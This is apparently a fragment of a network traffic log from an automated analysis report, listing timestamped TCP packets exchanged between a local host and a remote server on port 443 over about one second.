                                  Jan 11, 2025 04:35:35.292180061 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.292388916 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.292435884 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.292594910 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.292649031 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.292800903 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.292854071 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.292957067 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.293013096 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.293133020 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.293183088 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.293478966 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.293553114 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.293617010 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.293659925 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.294073105 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.294127941 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.294172049 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.294205904 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.294223070 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.294233084 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.294249058 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.294274092 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.294444084 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.294497013 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.294907093 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.294946909 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.294974089 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.295073986 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.295123100 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.295274973 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.295342922 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.295389891 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.295439005 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.295809031 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.295856953 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.296024084 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.296087027 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.296175003 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.296211004 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.296227932 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.296238899 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.296252012 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.296282053 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.296433926 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.296492100 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.297014952 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.297050953 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.297070980 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.297076941 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.297111034 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.297130108 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.297184944 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.297229052 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.297390938 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.297462940 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.384480953 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.384546041 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.384552002 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.384563923 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.384603024 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.384690046 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.384746075 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.527348995 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.527493000 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.527561903 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.527631044 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.527690887 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.527750015 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.527899981 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.527955055 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.528080940 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.528132915 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.528187037 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.528234005 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.528414965 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.528470993 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.528687000 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.528752089 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.528832912 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.528897047 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.528933048 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.528990030 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.529019117 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.529078007 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.529126883 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.529182911 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.530083895 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.530177116 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.530185938 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.530211926 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.530241966 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.530261040 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.530296087 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.530355930 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.533104897 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.533174992 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.533231974 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.533292055 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.533324957 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.533395052 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.533554077 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.533613920 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.533660889 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.533716917 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.533894062 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.533961058 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.533998013 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.534055948 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.534213066 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.534292936 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.534318924 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.534384012 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.534569979 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.534627914 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.534653902 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.534729004 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.534934998 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.534995079 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.535053015 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.535121918 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.535142899 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.535271883 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.535567999 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.535639048 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.535660028 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.535718918 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.535937071 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.536003113 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.618732929 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.618810892 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.618886948 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.618971109 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.619100094 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.619158983 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.619241953 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.619297028 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.619353056 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.619410038 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.619636059 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.619695902 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.619832993 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.619904995 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.619935989 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.619986057 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.620274067 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.620331049 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.620354891 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.620409966 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.620512009 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.620587111 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.620965958 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.621026039 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.621105909 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.621175051 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.621202946 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.621263027 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.621294022 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.621356964 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.621726990 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.621788025 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.621826887 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.621884108 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.621932983 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.621988058 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.622025967 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.622093916 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.622107029 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.622169018 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.622448921 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.622503996 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.622571945 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.622632027 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.622667074 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.622719049 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.622750998 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.622803926 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.763637066 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.763740063 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.763755083 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.763812065 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.763848066 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.763906956 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.764029980 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.764092922 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.764236927 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.764292955 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.764326096 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.764391899 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.764508963 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.764566898 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.764615059 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.764672995 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.764827967 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.764880896 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.764933109 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.764991999 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.765026093 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.765080929 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.765281916 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.765343904 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.765377045 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.765429020 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.765461922 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.765516043 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.765696049 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.765753031 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.765785933 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.765837908 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.766098976 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.766160965 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.766199112 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.766256094 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.766283035 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.766341925 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.766505003 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.766571999 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.766599894 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.766653061 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767067909 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767129898 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767180920 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767240047 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767291069 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767405033 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767443895 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767453909 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767467976 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767477036 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767501116 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767505884 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767534018 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767560005 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767575026 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767628908 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767663002 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767716885 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767788887 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767843962 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767870903 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.767924070 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.767999887 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.768049955 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.768085003 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.768136978 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.768399000 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.768450975 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.768493891 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.768543005 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.856276035 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.856364012 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.856415987 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.856468916 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.856518984 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.856569052 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.856666088 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.856724977 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.856816053 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.856865883 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.857023954 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.857079983 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.857126951 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.857180119 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.857223034 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.857280016 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.857328892 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.857384920 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.857450962 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.857501984 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.857631922 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.857687950 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.857713938 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.857765913 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.857990026 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.858047009 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.858077049 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.858135939 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.858206034 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.858261108 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.858294010 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.858351946 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.858591080 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.858710051 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.858747005 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.858805895 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.858843088 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.858896017 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.858932018 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.858983994 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.859119892 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.859189034 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.859213114 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.859277010 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.859369040 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.859432936 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.859441996 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.859483004 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.859512091 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.859525919 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.859576941 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.859632969 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.859690905 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.859752893 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.859795094 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.859859943 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.859910965 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.859966993 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.860002995 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.860066891 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.948581934 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.948662043 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.999627113 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.999743938 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.999804020 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.999852896 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:35.999888897 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:35.999939919 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.000004053 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.000051022 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.000143051 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.000185013 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.000269890 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.000314951 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.000401020 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.000472069 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.000479937 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.000531912 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.000588894 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.000636101 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.000700951 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.000746965 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.000772953 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.000787973 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.000801086 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.000829935 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.000993013 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001028061 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001080036 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001080036 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001086950 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001127005 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001240969 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001276970 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001286030 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001291037 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001311064 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001337051 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001367092 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001367092 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001372099 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001415968 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001538992 CET4434996139.103.20.105192.168.2.4
